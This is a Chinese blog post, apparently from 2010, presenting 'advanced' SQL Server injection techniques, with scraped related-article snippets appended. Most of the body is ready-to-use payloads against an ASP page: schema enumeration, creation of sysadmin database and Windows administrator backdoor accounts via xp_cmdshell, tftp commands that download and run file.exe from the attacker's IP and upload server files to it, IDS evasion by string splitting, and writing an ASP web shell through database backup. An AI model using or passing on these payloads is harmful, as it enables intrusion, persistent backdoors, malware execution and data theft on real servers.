桂林老兵php,桂林老兵的SQLSERVER高级注入技巧
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:
前言:
即是高级技巧,其它基本的注入方法就不详述了。
看不懂可查本站的注入基础文章。
为了更好的用好注入,建议大家看看本站的SQL语法相关文章
[获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and status>0 and name not in('table')
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;– //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;– //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;– //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';– //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';– //将系统用户test提升为管理员
这样,你在他的数据库和系统内都留下了test管理员账号了
下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器,将69端口打开]
id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';–
然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell 'file.exe';–
下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:
id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';–
绕过IDS的检测[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
新加的:
建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk='d:\web\db.asp';
报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@VERSION);
最后编辑:2010-12-02作者:admin
这个作者貌似有点懒,什么都没有留下。
桂林老兵php,桂林老兵的SQLSERVER高级注入技巧相关推荐
- 桂林老兵的SQLSERVER高级注入技巧
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友: 前言: 即是高级技巧,其它基本的注入方法就不详述了. 看不懂可查本站的注入基础文章. 为了更好的用好注入,建议大家看看本站的S ...
- 84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.高级注入技巧 dnslog无回显注入 1.原理 2.dnslog平台 3.MySQL dnslog无回显注入 ...
- Sqlserver 高级篇 聚集索引原理
原理 Sqlserver 高级篇 非聚集索引原理 说完非聚集索引 接着说 聚集索引 聚集索引就是把数据按照 用户设置排好顺序 与非聚集索引不同 非聚集索引不会动数据页 只会新增一个索引表 聚集索引直 ...
- “阿一web标准学堂”选修课:EditPlus高级使用技巧(附视频、课件、代码下载)...
阿一web标准学堂 <阿一web标准学堂>是一套面向web标准初学者的视频系列.虽然我也只是一个web标准刚入门的学习者,但是我还是希望能通过这个学堂将自己学习到的东西与大家分享,这样不仅 ...
- (011) Linux之高级键盘技巧
十年运维系列之基础篇 - Linux 作者:曾林 联系:1494445739@qq.com 网站:www.jplatformx.com 版权:文章未经同意请勿转载 一.引言 这里指的高级键盘技巧其实有 ...
- idea调试debug技巧_这几个IDEA高级调试技巧,用了都说好!
转载自: dwz.cn/zMaNp9Kf 本文将讲解的高级调试技巧如下: 条件断点 回到"上一步" 多线程调试 远程调试 临时执行表达式/修改变量的运行值 一.条件断点 循环中经常 ...
- python高级应用_Python高级编程技巧
Python 高级编程技巧 本文展示一些高级的 Python 设计结构和它们的使用方法.在日常工作中,你可以根据需要 选择合适的数据结构, 例如对快速查找性的要求. 对数据一致性的要求或是对索引的要求 ...
- android 字体加粗有阴影,Android TextView高级显示技巧实例小结
本文实例总结了Android TextView高级显示技巧.分享给大家供大家参考,具体如下: 1. 自定义字体 可以使用setTypeface(Typeface)方法来设置文本框内文本的字体,而And ...
- HiveSQL高级进阶技巧
直接上干货,HiveSQL高级进阶技巧,重要性不言而喻.掌握这10个技巧,你的SQL水平将有一个质的提升! 1.删除: insert overwrite tmp select * from tmp w ...
- 6个高级Python技巧
前言 Python是一种面向对象的语言,它与英语非常相似,因此对于初学者来说是一种非常好的语言.它的高级特性和受支持的库包甚至可以用几行代码来编写复杂的任务.在本文中,我们将介绍python的一些高级 ...
最新文章
- h5页面笔按下默认是拖动_屡屡刷屏的长页面H5原来是这样诞生的
- c++ 原子操作 赋值_原子操作原理
- fastdfs java上传文件_FastDFS java客户端文件上传demo
- A Simple Problem with Integers POJ - 3468 (线段树)
- 部署在SAP ABAP服务器上的SAP UI5应用,resource root的计算逻辑
- C语言 串口通知消息,编程模式·观察者模式、事件通知、消息队列三者区别
- java对五排六列考生随机排座,Java入门第三季6-5扩展练习-随机字符串排序
- BFS HDOJ 2102 A计划
- WordPress内核站群全自动新闻采集发布源码,单站专用
- java 过滤器 弹出提示_JavaWeb 过滤器——验证登录 防止未登录进入界面
- 7000块招不了一个工人
- Java项目迁移到uap上_Tomcat启动,不能加载项目问题。
- 中文核心期刊有哪些?
- 计算机辅助公差技术主要研究内容,计算机辅助形位公差类型生成技术的分析研究.pdf...
- 一款智能家居APP的雏形
- 战略管理学习---第2章 战略目标
- When I’m old and dying
- 【搜索】桐桐的运输方案
- 同行评审就是个笑话!Nature爆料:计算机生成的垃圾文章竟还能被接受,64%来自中国...
- ZCMU 1919 :kirito's 星爆气流斩 (多重背包问题)